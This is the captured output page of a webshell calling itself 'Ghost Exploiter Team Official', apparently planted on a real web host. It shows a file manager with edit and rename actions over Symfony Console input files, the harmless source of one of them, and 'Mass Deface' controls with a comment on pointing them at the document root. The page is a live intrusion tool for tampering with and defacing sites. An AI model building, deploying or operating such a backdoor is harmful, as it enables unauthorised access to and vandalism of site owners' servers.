webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
console
/
Input
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
ArgvInput.php
12.16KB
edt
ren
ArrayInput.php
5.525KB
edt
ren
Input.php
5.067KB
edt
ren
InputArgument.php
4.959KB
edt
ren
InputAwareInterface.php
0.583KB
edt
ren
InputDefinition.php
11.656KB
edt
ren
InputInterface.php
4.583KB
edt
ren
InputOption.php
8.34KB
edt
ren
StreamableInputInterfac
...
0.879KB
edt
ren
StringInput.php
2.68KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Console\Input; /** * StreamableInputInterface is the interface implemented by all input classes * that have an input stream. * * @author Robin Chalas <robin.chalas@gmail.com> */ interface StreamableInputInterface extends InputInterface { /** * Sets the input stream to read from when interacting with the user. * * This is mainly useful for testing purpose. * * @param resource $stream The input stream * * @return void */ public function setStream($stream); /** * Returns the input stream. * * @return resource|null */ public function getStream(); }
<=Back
Liking